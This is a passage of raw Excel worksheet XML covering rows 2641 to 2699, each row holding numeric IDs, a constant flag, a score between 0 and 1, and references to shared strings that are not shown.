      </c>
      <c r="C2641">
        <v>4564</v>
      </c>
      <c r="D2641">
        <v>1</v>
      </c>
      <c r="E2641">
        <v>0.6754000186920166</v>
      </c>
      <c r="F2641" t="s">
        <v>3911</v>
      </c>
      <c r="G2641" t="s">
        <v>5217</v>
      </c>
      <c r="H2641" t="s">
        <v>5218</v>
      </c>
    </row>
    <row r="2642" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2642" s="1">
        <v>2640</v>
      </c>
      <c r="B2642">
        <v>808</v>
      </c>
      <c r="C2642">
        <v>808</v>
      </c>
      <c r="D2642">
        <v>1</v>
      </c>
      <c r="E2642">
        <v>0.64469999074935913</v>
      </c>
      <c r="F2642" t="s">
        <v>3911</v>
      </c>
      <c r="G2642" t="s">
        <v>5219</v>
      </c>
      <c r="H2642" t="s">
        <v>5220</v>
      </c>
    </row>
    <row r="2643" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2643" s="1">
        <v>2641</v>
      </c>
      <c r="B2643">
        <v>807</v>
      </c>
      <c r="C2643">
        <v>807</v>
      </c>
      <c r="D2643">
        <v>1</v>
      </c>
      <c r="E2643">
        <v>0.99870002269744873</v>
      </c>
      <c r="F2643" t="s">
        <v>3911</v>
      </c>
      <c r="G2643" t="s">
        <v>5221</v>
      </c>
      <c r="H2643" t="s">
        <v>5222</v>
      </c>
    </row>
    <row r="2644" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2644" s="1">
        <v>2642</v>
      </c>
      <c r="B2644">
        <v>2133</v>
      </c>
      <c r="C2644">
        <v>2133</v>
      </c>
      <c r="D2644">
        <v>1</v>
      </c>
      <c r="E2644">
        <v>0.90659999847412109</v>
      </c>
      <c r="F2644" t="s">
        <v>3911</v>
      </c>
      <c r="G2644" t="s">
        <v>5223</v>
      </c>
      <c r="H2644" t="s">
        <v>5224</v>
      </c>
    </row>
    <row r="2645" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2645" s="1">
        <v>2643</v>
      </c>
      <c r="B2645">
        <v>2134</v>
      </c>
      <c r="C2645">
        <v>2134</v>
      </c>
      <c r="D2645">
        <v>1</v>
      </c>
      <c r="E2645">
        <v>0.69599997997283936</v>
      </c>
      <c r="F2645" t="s">
        <v>3911</v>
      </c>
      <c r="G2645" t="s">
        <v>5225</v>
      </c>
      <c r="H2645" t="s">
        <v>5226</v>
      </c>
    </row>
    <row r="2646" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2646" s="1">
        <v>2644</v>
      </c>
      <c r="B2646">
        <v>6450</v>
      </c>
      <c r="C2646">
        <v>6450</v>
      </c>
      <c r="D2646">
        <v>1</v>
      </c>
      <c r="E2646">
        <v>0.76590001583099365</v>
      </c>
      <c r="F2646" t="s">
        <v>3911</v>
      </c>
      <c r="G2646" t="s">
        <v>5227</v>
      </c>
      <c r="H2646" t="s">
        <v>5228</v>
      </c>
    </row>
    <row r="2647" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2647" s="1">
        <v>2645</v>
      </c>
      <c r="B2647">
        <v>797</v>
      </c>
      <c r="C2647">
        <v>797</v>
      </c>
      <c r="D2647">
        <v>1</v>
      </c>
      <c r="E2647">
        <v>0.84049999713897705</v>
      </c>
      <c r="F2647" t="s">
        <v>3911</v>
      </c>
      <c r="G2647" t="s">
        <v>5229</v>
      </c>
      <c r="H2647" t="s">
        <v>5230</v>
      </c>
    </row>
    <row r="2648" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2648" s="1">
        <v>2646</v>
      </c>
      <c r="B2648">
        <v>7552</v>
      </c>
      <c r="C2648">
        <v>7552</v>
      </c>
      <c r="D2648">
        <v>1</v>
      </c>
      <c r="E2648">
        <v>0.88349997997283936</v>
      </c>
      <c r="F2648" t="s">
        <v>3911</v>
      </c>
      <c r="G2648" t="s">
        <v>5231</v>
      </c>
      <c r="H2648" t="s">
        <v>5232</v>
      </c>
    </row>
    <row r="2649" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2649" s="1">
        <v>2647</v>
      </c>
      <c r="B2649">
        <v>6966</v>
      </c>
      <c r="C2649">
        <v>6966</v>
      </c>
      <c r="D2649">
        <v>1</v>
      </c>
      <c r="E2649">
        <v>0.64639997482299805</v>
      </c>
      <c r="F2649" t="s">
        <v>3911</v>
      </c>
      <c r="G2649" t="s">
        <v>5233</v>
      </c>
      <c r="H2649" t="s">
        <v>5234</v>
      </c>
    </row>
    <row r="2650" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2650" s="1">
        <v>2648</v>
      </c>
      <c r="B2650">
        <v>6026</v>
      </c>
      <c r="C2650">
        <v>6026</v>
      </c>
      <c r="D2650">
        <v>1</v>
      </c>
      <c r="E2650">
        <v>0.51069998741149902</v>
      </c>
      <c r="F2650" t="s">
        <v>3911</v>
      </c>
      <c r="G2650" t="s">
        <v>5235</v>
      </c>
      <c r="H2650" t="s">
        <v>5236</v>
      </c>
    </row>
    <row r="2651" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2651" s="1">
        <v>2649</v>
      </c>
      <c r="B2651">
        <v>6315</v>
      </c>
      <c r="C2651">
        <v>6315</v>
      </c>
      <c r="D2651">
        <v>1</v>
      </c>
      <c r="E2651">
        <v>0.98479998111724854</v>
      </c>
      <c r="F2651" t="s">
        <v>3911</v>
      </c>
      <c r="G2651" t="s">
        <v>5237</v>
      </c>
      <c r="H2651" t="s">
        <v>5238</v>
      </c>
    </row>
    <row r="2652" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2652" s="1">
        <v>2650</v>
      </c>
      <c r="B2652">
        <v>3941</v>
      </c>
      <c r="C2652">
        <v>3941</v>
      </c>
      <c r="D2652">
        <v>1</v>
      </c>
      <c r="E2652">
        <v>0.99849998950958252</v>
      </c>
      <c r="F2652" t="s">
        <v>3911</v>
      </c>
      <c r="G2652" t="s">
        <v>5239</v>
      </c>
      <c r="H2652" t="s">
        <v>5240</v>
      </c>
    </row>
    <row r="2653" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2653" s="1">
        <v>2651</v>
      </c>
      <c r="B2653">
        <v>7554</v>
      </c>
      <c r="C2653">
        <v>7554</v>
      </c>
      <c r="D2653">
        <v>1</v>
      </c>
      <c r="E2653">
        <v>0.99930000305175781</v>
      </c>
      <c r="F2653" t="s">
        <v>3911</v>
      </c>
      <c r="G2653" t="s">
        <v>5241</v>
      </c>
      <c r="H2653" t="s">
        <v>5242</v>
      </c>
    </row>
    <row r="2654" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2654" s="1">
        <v>2652</v>
      </c>
      <c r="B2654">
        <v>3779</v>
      </c>
      <c r="C2654">
        <v>3779</v>
      </c>
      <c r="D2654">
        <v>1</v>
      </c>
      <c r="E2654">
        <v>0.48690000176429749</v>
      </c>
      <c r="F2654" t="s">
        <v>3911</v>
      </c>
      <c r="G2654" t="s">
        <v>5243</v>
      </c>
      <c r="H2654" t="s">
        <v>5244</v>
      </c>
    </row>
    <row r="2655" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2655" s="1">
        <v>2653</v>
      </c>
      <c r="B2655">
        <v>2120</v>
      </c>
      <c r="C2655">
        <v>2120</v>
      </c>
      <c r="D2655">
        <v>1</v>
      </c>
      <c r="E2655">
        <v>0.99830001592636108</v>
      </c>
      <c r="F2655" t="s">
        <v>3911</v>
      </c>
      <c r="G2655" t="s">
        <v>5245</v>
      </c>
      <c r="H2655" t="s">
        <v>5246</v>
      </c>
    </row>
    <row r="2656" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2656" s="1">
        <v>2654</v>
      </c>
      <c r="B2656">
        <v>7555</v>
      </c>
      <c r="C2656">
        <v>7555</v>
      </c>
      <c r="D2656">
        <v>1</v>
      </c>
      <c r="E2656">
        <v>0.81929999589920044</v>
      </c>
      <c r="F2656" t="s">
        <v>3911</v>
      </c>
      <c r="G2656" t="s">
        <v>5247</v>
      </c>
      <c r="H2656" t="s">
        <v>5248</v>
      </c>
    </row>
    <row r="2657" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2657" s="1">
        <v>2655</v>
      </c>
      <c r="B2657">
        <v>6955</v>
      </c>
      <c r="C2657">
        <v>6955</v>
      </c>
      <c r="D2657">
        <v>1</v>
      </c>
      <c r="E2657">
        <v>0.53960001468658447</v>
      </c>
      <c r="F2657" t="s">
        <v>3911</v>
      </c>
      <c r="G2657" t="s">
        <v>5249</v>
      </c>
      <c r="H2657" t="s">
        <v>5250</v>
      </c>
    </row>
    <row r="2658" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2658" s="1">
        <v>2656</v>
      </c>
      <c r="B2658">
        <v>6953</v>
      </c>
      <c r="C2658">
        <v>6953</v>
      </c>
      <c r="D2658">
        <v>1</v>
      </c>
      <c r="E2658">
        <v>0.99099999666213989</v>
      </c>
      <c r="F2658" t="s">
        <v>3911</v>
      </c>
      <c r="G2658" t="s">
        <v>5251</v>
      </c>
      <c r="H2658" t="s">
        <v>5252</v>
      </c>
    </row>
    <row r="2659" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2659" s="1">
        <v>2657</v>
      </c>
      <c r="B2659">
        <v>3781</v>
      </c>
      <c r="C2659">
        <v>3781</v>
      </c>
      <c r="D2659">
        <v>1</v>
      </c>
      <c r="E2659">
        <v>0.38429999351501459</v>
      </c>
      <c r="F2659" t="s">
        <v>3911</v>
      </c>
      <c r="G2659" t="s">
        <v>5253</v>
      </c>
      <c r="H2659" t="s">
        <v>5254</v>
      </c>
    </row>
    <row r="2660" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2660" s="1">
        <v>2658</v>
      </c>
      <c r="B2660">
        <v>3344</v>
      </c>
      <c r="C2660">
        <v>3344</v>
      </c>
      <c r="D2660">
        <v>1</v>
      </c>
      <c r="E2660">
        <v>0.71009999513626099</v>
      </c>
      <c r="F2660" t="s">
        <v>3911</v>
      </c>
      <c r="G2660" t="s">
        <v>5255</v>
      </c>
      <c r="H2660" t="s">
        <v>5256</v>
      </c>
    </row>
    <row r="2661" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2661" s="1">
        <v>2659</v>
      </c>
      <c r="B2661">
        <v>4431</v>
      </c>
      <c r="C2661">
        <v>4431</v>
      </c>
      <c r="D2661">
        <v>1</v>
      </c>
      <c r="E2661">
        <v>0.99900001287460327</v>
      </c>
      <c r="F2661" t="s">
        <v>3911</v>
      </c>
      <c r="G2661" t="s">
        <v>5257</v>
      </c>
      <c r="H2661" t="s">
        <v>5258</v>
      </c>
    </row>
    <row r="2662" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2662" s="1">
        <v>2660</v>
      </c>
      <c r="B2662">
        <v>6038</v>
      </c>
      <c r="C2662">
        <v>6038</v>
      </c>
      <c r="D2662">
        <v>1</v>
      </c>
      <c r="E2662">
        <v>0.73449999094009399</v>
      </c>
      <c r="F2662" t="s">
        <v>3911</v>
      </c>
      <c r="G2662" t="s">
        <v>5259</v>
      </c>
      <c r="H2662" t="s">
        <v>5260</v>
      </c>
    </row>
    <row r="2663" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2663" s="1">
        <v>2661</v>
      </c>
      <c r="B2663">
        <v>780</v>
      </c>
      <c r="C2663">
        <v>780</v>
      </c>
      <c r="D2663">
        <v>1</v>
      </c>
      <c r="E2663">
        <v>0.99790000915527344</v>
      </c>
      <c r="F2663" t="s">
        <v>3911</v>
      </c>
      <c r="G2663" t="s">
        <v>5261</v>
      </c>
      <c r="H2663" t="s">
        <v>5262</v>
      </c>
    </row>
    <row r="2664" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2664" s="1">
        <v>2662</v>
      </c>
      <c r="B2664">
        <v>5750</v>
      </c>
      <c r="C2664">
        <v>5750</v>
      </c>
      <c r="D2664">
        <v>1</v>
      </c>
      <c r="E2664">
        <v>0.99629998207092285</v>
      </c>
      <c r="F2664" t="s">
        <v>3911</v>
      </c>
      <c r="G2664" t="s">
        <v>5263</v>
      </c>
      <c r="H2664" t="s">
        <v>5264</v>
      </c>
    </row>
    <row r="2665" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2665" s="1">
        <v>2663</v>
      </c>
      <c r="B2665">
        <v>6042</v>
      </c>
      <c r="C2665">
        <v>6042</v>
      </c>
      <c r="D2665">
        <v>1</v>
      </c>
      <c r="E2665">
        <v>0.73059999942779541</v>
      </c>
      <c r="F2665" t="s">
        <v>3911</v>
      </c>
      <c r="G2665" t="s">
        <v>5265</v>
      </c>
      <c r="H2665" t="s">
        <v>5266</v>
      </c>
    </row>
    <row r="2666" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2666" s="1">
        <v>2664</v>
      </c>
      <c r="B2666">
        <v>5173</v>
      </c>
      <c r="C2666">
        <v>5173</v>
      </c>
      <c r="D2666">
        <v>1</v>
      </c>
      <c r="E2666">
        <v>0.97930002212524414</v>
      </c>
      <c r="F2666" t="s">
        <v>3911</v>
      </c>
      <c r="G2666" t="s">
        <v>5267</v>
      </c>
      <c r="H2666" t="s">
        <v>5268</v>
      </c>
    </row>
    <row r="2667" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2667" s="1">
        <v>2665</v>
      </c>
      <c r="B2667">
        <v>196</v>
      </c>
      <c r="C2667">
        <v>196</v>
      </c>
      <c r="D2667">
        <v>1</v>
      </c>
      <c r="E2667">
        <v>0.99800002574920654</v>
      </c>
      <c r="F2667" t="s">
        <v>3911</v>
      </c>
      <c r="G2667" t="s">
        <v>5269</v>
      </c>
      <c r="H2667" t="s">
        <v>5270</v>
      </c>
    </row>
    <row r="2668" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2668" s="1">
        <v>2666</v>
      </c>
      <c r="B2668">
        <v>6935</v>
      </c>
      <c r="C2668">
        <v>6935</v>
      </c>
      <c r="D2668">
        <v>1</v>
      </c>
      <c r="E2668">
        <v>0.59930002689361572</v>
      </c>
      <c r="F2668" t="s">
        <v>3911</v>
      </c>
      <c r="G2668" t="s">
        <v>5271</v>
      </c>
      <c r="H2668" t="s">
        <v>5272</v>
      </c>
    </row>
    <row r="2669" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2669" s="1">
        <v>2667</v>
      </c>
      <c r="B2669">
        <v>770</v>
      </c>
      <c r="C2669">
        <v>770</v>
      </c>
      <c r="D2669">
        <v>1</v>
      </c>
      <c r="E2669">
        <v>0.99279999732971191</v>
      </c>
      <c r="F2669" t="s">
        <v>3911</v>
      </c>
      <c r="G2669" t="s">
        <v>5273</v>
      </c>
      <c r="H2669" t="s">
        <v>5274</v>
      </c>
    </row>
    <row r="2670" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2670" s="1">
        <v>2668</v>
      </c>
      <c r="B2670">
        <v>2167</v>
      </c>
      <c r="C2670">
        <v>2167</v>
      </c>
      <c r="D2670">
        <v>1</v>
      </c>
      <c r="E2670">
        <v>0.99750000238418579</v>
      </c>
      <c r="F2670" t="s">
        <v>3911</v>
      </c>
      <c r="G2670" t="s">
        <v>5275</v>
      </c>
      <c r="H2670" t="s">
        <v>5276</v>
      </c>
    </row>
    <row r="2671" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2671" s="1">
        <v>2669</v>
      </c>
      <c r="B2671">
        <v>4412</v>
      </c>
      <c r="C2671">
        <v>4412</v>
      </c>
      <c r="D2671">
        <v>1</v>
      </c>
      <c r="E2671">
        <v>0.99709999561309814</v>
      </c>
      <c r="F2671" t="s">
        <v>3911</v>
      </c>
      <c r="G2671" t="s">
        <v>5277</v>
      </c>
      <c r="H2671" t="s">
        <v>5278</v>
      </c>
    </row>
    <row r="2672" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2672" s="1">
        <v>2670</v>
      </c>
      <c r="B2672">
        <v>7082</v>
      </c>
      <c r="C2672">
        <v>7082</v>
      </c>
      <c r="D2672">
        <v>1</v>
      </c>
      <c r="E2672">
        <v>0.67409998178482056</v>
      </c>
      <c r="F2672" t="s">
        <v>3911</v>
      </c>
      <c r="G2672" t="s">
        <v>5279</v>
      </c>
      <c r="H2672" t="s">
        <v>5280</v>
      </c>
    </row>
    <row r="2673" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2673" s="1">
        <v>2671</v>
      </c>
      <c r="B2673">
        <v>2117</v>
      </c>
      <c r="C2673">
        <v>2117</v>
      </c>
      <c r="D2673">
        <v>1</v>
      </c>
      <c r="E2673">
        <v>0.98970001935958862</v>
      </c>
      <c r="F2673" t="s">
        <v>3911</v>
      </c>
      <c r="G2673" t="s">
        <v>5281</v>
      </c>
      <c r="H2673" t="s">
        <v>5282</v>
      </c>
    </row>
    <row r="2674" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2674" s="1">
        <v>2672</v>
      </c>
      <c r="B2674">
        <v>7010</v>
      </c>
      <c r="C2674">
        <v>7010</v>
      </c>
      <c r="D2674">
        <v>1</v>
      </c>
      <c r="E2674">
        <v>0.51560002565383911</v>
      </c>
      <c r="F2674" t="s">
        <v>3911</v>
      </c>
      <c r="G2674" t="s">
        <v>5283</v>
      </c>
      <c r="H2674" t="s">
        <v>5284</v>
      </c>
    </row>
    <row r="2675" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2675" s="1">
        <v>2673</v>
      </c>
      <c r="B2675">
        <v>5494</v>
      </c>
      <c r="C2675">
        <v>5494</v>
      </c>
      <c r="D2675">
        <v>1</v>
      </c>
      <c r="E2675">
        <v>0.99809998273849487</v>
      </c>
      <c r="F2675" t="s">
        <v>3911</v>
      </c>
      <c r="G2675" t="s">
        <v>5285</v>
      </c>
      <c r="H2675" t="s">
        <v>5286</v>
      </c>
    </row>
    <row r="2676" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2676" s="1">
        <v>2674</v>
      </c>
      <c r="B2676">
        <v>2055</v>
      </c>
      <c r="C2676">
        <v>2055</v>
      </c>
      <c r="D2676">
        <v>1</v>
      </c>
      <c r="E2676">
        <v>0.86239999532699585</v>
      </c>
      <c r="F2676" t="s">
        <v>3911</v>
      </c>
      <c r="G2676" t="s">
        <v>5287</v>
      </c>
      <c r="H2676" t="s">
        <v>5288</v>
      </c>
    </row>
    <row r="2677" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2677" s="1">
        <v>2675</v>
      </c>
      <c r="B2677">
        <v>838</v>
      </c>
      <c r="C2677">
        <v>838</v>
      </c>
      <c r="D2677">
        <v>1</v>
      </c>
      <c r="E2677">
        <v>0.73430001735687256</v>
      </c>
      <c r="F2677" t="s">
        <v>3911</v>
      </c>
      <c r="G2677" t="s">
        <v>5289</v>
      </c>
      <c r="H2677" t="s">
        <v>5290</v>
      </c>
    </row>
    <row r="2678" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2678" s="1">
        <v>2676</v>
      </c>
      <c r="B2678">
        <v>2062</v>
      </c>
      <c r="C2678">
        <v>2062</v>
      </c>
      <c r="D2678">
        <v>1</v>
      </c>
      <c r="E2678">
        <v>0.99570000171661377</v>
      </c>
      <c r="F2678" t="s">
        <v>3911</v>
      </c>
      <c r="G2678" t="s">
        <v>5291</v>
      </c>
      <c r="H2678" t="s">
        <v>5292</v>
      </c>
    </row>
    <row r="2679" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2679" s="1">
        <v>2677</v>
      </c>
      <c r="B2679">
        <v>6001</v>
      </c>
      <c r="C2679">
        <v>6001</v>
      </c>
      <c r="D2679">
        <v>1</v>
      </c>
      <c r="E2679">
        <v>0.76090002059936523</v>
      </c>
      <c r="F2679" t="s">
        <v>3911</v>
      </c>
      <c r="G2679" t="s">
        <v>5293</v>
      </c>
      <c r="H2679" t="s">
        <v>5294</v>
      </c>
    </row>
    <row r="2680" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2680" s="1">
        <v>2678</v>
      </c>
      <c r="B2680">
        <v>4500</v>
      </c>
      <c r="C2680">
        <v>4500</v>
      </c>
      <c r="D2680">
        <v>1</v>
      </c>
      <c r="E2680">
        <v>0.79079997539520264</v>
      </c>
      <c r="F2680" t="s">
        <v>3911</v>
      </c>
      <c r="G2680" t="s">
        <v>5295</v>
      </c>
      <c r="H2680" t="s">
        <v>5296</v>
      </c>
    </row>
    <row r="2681" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2681" s="1">
        <v>2679</v>
      </c>
      <c r="B2681">
        <v>5491</v>
      </c>
      <c r="C2681">
        <v>5491</v>
      </c>
      <c r="D2681">
        <v>1</v>
      </c>
      <c r="E2681">
        <v>0.77649998664855957</v>
      </c>
      <c r="F2681" t="s">
        <v>3911</v>
      </c>
      <c r="G2681" t="s">
        <v>5297</v>
      </c>
      <c r="H2681" t="s">
        <v>5298</v>
      </c>
    </row>
    <row r="2682" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2682" s="1">
        <v>2680</v>
      </c>
      <c r="B2682">
        <v>6007</v>
      </c>
      <c r="C2682">
        <v>6007</v>
      </c>
      <c r="D2682">
        <v>1</v>
      </c>
      <c r="E2682">
        <v>0.67629998922348022</v>
      </c>
      <c r="F2682" t="s">
        <v>3911</v>
      </c>
      <c r="G2682" t="s">
        <v>5299</v>
      </c>
      <c r="H2682" t="s">
        <v>5300</v>
      </c>
    </row>
    <row r="2683" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2683" s="1">
        <v>2681</v>
      </c>
      <c r="B2683">
        <v>5136</v>
      </c>
      <c r="C2683">
        <v>5136</v>
      </c>
      <c r="D2683">
        <v>1</v>
      </c>
      <c r="E2683">
        <v>0.93199998140335083</v>
      </c>
      <c r="F2683" t="s">
        <v>3911</v>
      </c>
      <c r="G2683" t="s">
        <v>5301</v>
      </c>
      <c r="H2683" t="s">
        <v>5302</v>
      </c>
    </row>
    <row r="2684" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2684" s="1">
        <v>2682</v>
      </c>
      <c r="B2684">
        <v>2076</v>
      </c>
      <c r="C2684">
        <v>2076</v>
      </c>
      <c r="D2684">
        <v>1</v>
      </c>
      <c r="E2684">
        <v>0.96679997444152832</v>
      </c>
      <c r="F2684" t="s">
        <v>3911</v>
      </c>
      <c r="G2684" t="s">
        <v>5303</v>
      </c>
      <c r="H2684" t="s">
        <v>5304</v>
      </c>
    </row>
    <row r="2685" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2685" s="1">
        <v>2683</v>
      </c>
      <c r="B2685">
        <v>2077</v>
      </c>
      <c r="C2685">
        <v>2077</v>
      </c>
      <c r="D2685">
        <v>1</v>
      </c>
      <c r="E2685">
        <v>0.99889999628067017</v>
      </c>
      <c r="F2685" t="s">
        <v>3911</v>
      </c>
      <c r="G2685" t="s">
        <v>5305</v>
      </c>
      <c r="H2685" t="s">
        <v>5306</v>
      </c>
    </row>
    <row r="2686" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2686" s="1">
        <v>2684</v>
      </c>
      <c r="B2686">
        <v>5488</v>
      </c>
      <c r="C2686">
        <v>5488</v>
      </c>
      <c r="D2686">
        <v>1</v>
      </c>
      <c r="E2686">
        <v>0.70010000467300415</v>
      </c>
      <c r="F2686" t="s">
        <v>3911</v>
      </c>
      <c r="G2686" t="s">
        <v>5307</v>
      </c>
      <c r="H2686" t="s">
        <v>5308</v>
      </c>
    </row>
    <row r="2687" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2687" s="1">
        <v>2685</v>
      </c>
      <c r="B2687">
        <v>2118</v>
      </c>
      <c r="C2687">
        <v>2118</v>
      </c>
      <c r="D2687">
        <v>1</v>
      </c>
      <c r="E2687">
        <v>0.99739998579025269</v>
      </c>
      <c r="F2687" t="s">
        <v>3911</v>
      </c>
      <c r="G2687" t="s">
        <v>5309</v>
      </c>
      <c r="H2687" t="s">
        <v>5310</v>
      </c>
    </row>
    <row r="2688" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2688" s="1">
        <v>2686</v>
      </c>
      <c r="B2688">
        <v>4492</v>
      </c>
      <c r="C2688">
        <v>4492</v>
      </c>
      <c r="D2688">
        <v>1</v>
      </c>
      <c r="E2688">
        <v>0.99910002946853638</v>
      </c>
      <c r="F2688" t="s">
        <v>3911</v>
      </c>
      <c r="G2688" t="s">
        <v>5311</v>
      </c>
      <c r="H2688" t="s">
        <v>5312</v>
      </c>
    </row>
    <row r="2689" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2689" s="1">
        <v>2687</v>
      </c>
      <c r="B2689">
        <v>7854</v>
      </c>
      <c r="C2689">
        <v>7854</v>
      </c>
      <c r="D2689">
        <v>1</v>
      </c>
      <c r="E2689">
        <v>0.9976000189781189</v>
      </c>
      <c r="F2689" t="s">
        <v>3911</v>
      </c>
      <c r="G2689" t="s">
        <v>5313</v>
      </c>
      <c r="H2689" t="s">
        <v>5314</v>
      </c>
    </row>
    <row r="2690" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2690" s="1">
        <v>2688</v>
      </c>
      <c r="B2690">
        <v>6443</v>
      </c>
      <c r="C2690">
        <v>6443</v>
      </c>
      <c r="D2690">
        <v>1</v>
      </c>
      <c r="E2690">
        <v>0.99949997663497925</v>
      </c>
      <c r="F2690" t="s">
        <v>3911</v>
      </c>
      <c r="G2690" t="s">
        <v>5315</v>
      </c>
      <c r="H2690" t="s">
        <v>5316</v>
      </c>
    </row>
    <row r="2691" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2691" s="1">
        <v>2689</v>
      </c>
      <c r="B2691">
        <v>4486</v>
      </c>
      <c r="C2691">
        <v>4486</v>
      </c>
      <c r="D2691">
        <v>1</v>
      </c>
      <c r="E2691">
        <v>0.46419999003410339</v>
      </c>
      <c r="F2691" t="s">
        <v>3911</v>
      </c>
      <c r="G2691" t="s">
        <v>5317</v>
      </c>
      <c r="H2691" t="s">
        <v>5318</v>
      </c>
    </row>
    <row r="2692" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2692" s="1">
        <v>2690</v>
      </c>
      <c r="B2692">
        <v>4484</v>
      </c>
      <c r="C2692">
        <v>4484</v>
      </c>
      <c r="D2692">
        <v>1</v>
      </c>
      <c r="E2692">
        <v>0.33849999308586121</v>
      </c>
      <c r="F2692" t="s">
        <v>3911</v>
      </c>
      <c r="G2692" t="s">
        <v>5319</v>
      </c>
      <c r="H2692" t="s">
        <v>5320</v>
      </c>
    </row>
    <row r="2693" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2693" s="1">
        <v>2691</v>
      </c>
      <c r="B2693">
        <v>6446</v>
      </c>
      <c r="C2693">
        <v>6446</v>
      </c>
      <c r="D2693">
        <v>1</v>
      </c>
      <c r="E2693">
        <v>0.99919998645782471</v>
      </c>
      <c r="F2693" t="s">
        <v>3911</v>
      </c>
      <c r="G2693" t="s">
        <v>5321</v>
      </c>
      <c r="H2693" t="s">
        <v>5322</v>
      </c>
    </row>
    <row r="2694" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2694" s="1">
        <v>2692</v>
      </c>
      <c r="B2694">
        <v>169</v>
      </c>
      <c r="C2694">
        <v>169</v>
      </c>
      <c r="D2694">
        <v>1</v>
      </c>
      <c r="E2694">
        <v>0.99910002946853638</v>
      </c>
      <c r="F2694" t="s">
        <v>3911</v>
      </c>
      <c r="G2694" t="s">
        <v>5323</v>
      </c>
      <c r="H2694" t="s">
        <v>5324</v>
      </c>
    </row>
    <row r="2695" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2695" s="1">
        <v>2693</v>
      </c>
      <c r="B2695">
        <v>4472</v>
      </c>
      <c r="C2695">
        <v>4472</v>
      </c>
      <c r="D2695">
        <v>1</v>
      </c>
      <c r="E2695">
        <v>0.99709999561309814</v>
      </c>
      <c r="F2695" t="s">
        <v>3911</v>
      </c>
      <c r="G2695" t="s">
        <v>5325</v>
      </c>
      <c r="H2695" t="s">
        <v>5326</v>
      </c>
    </row>
    <row r="2696" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2696" s="1">
        <v>2694</v>
      </c>
      <c r="B2696">
        <v>5486</v>
      </c>
      <c r="C2696">
        <v>5486</v>
      </c>
      <c r="D2696">
        <v>1</v>
      </c>
      <c r="E2696">
        <v>0.99970000982284546</v>
      </c>
      <c r="F2696" t="s">
        <v>3911</v>
      </c>
      <c r="G2696" t="s">
        <v>5327</v>
      </c>
      <c r="H2696" t="s">
        <v>5328</v>
      </c>
    </row>
    <row r="2697" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2697" s="1">
        <v>2695</v>
      </c>
      <c r="B2697">
        <v>2104</v>
      </c>
      <c r="C2697">
        <v>2104</v>
      </c>
      <c r="D2697">
        <v>1</v>
      </c>
      <c r="E2697">
        <v>0.46189999580383301</v>
      </c>
      <c r="F2697" t="s">
        <v>3911</v>
      </c>
      <c r="G2697" t="s">
        <v>5329</v>
      </c>
      <c r="H2697" t="s">
        <v>5330</v>
      </c>
    </row>
    <row r="2698" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2698" s="1">
        <v>2696</v>
      </c>
      <c r="B2698">
        <v>5484</v>
      </c>
      <c r="C2698">
        <v>5484</v>
      </c>
      <c r="D2698">
        <v>1</v>
      </c>
      <c r="E2698">
        <v>0.98379999399185181</v>
      </c>
      <c r="F2698" t="s">
        <v>3911</v>
      </c>
      <c r="G2698" t="s">
        <v>5331</v>
      </c>
      <c r="H2698" t="s">
        <v>5332</v>
      </c>
    </row>
    <row r="2699" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2699" s="1">
        <v>2697</v>
      </c>
      <c r="B2699">
        <v>3373</v>
      </c>
      <c r="C2699">
        <v>3373</v>
      </c>
      <c r="D2699">
        <v>1</v>
      </c>
      <c r="E2699">
        <v>0.44020000100135798</v>
      </c>
      <c r="F2699" t="s">
        <v>3911</v>
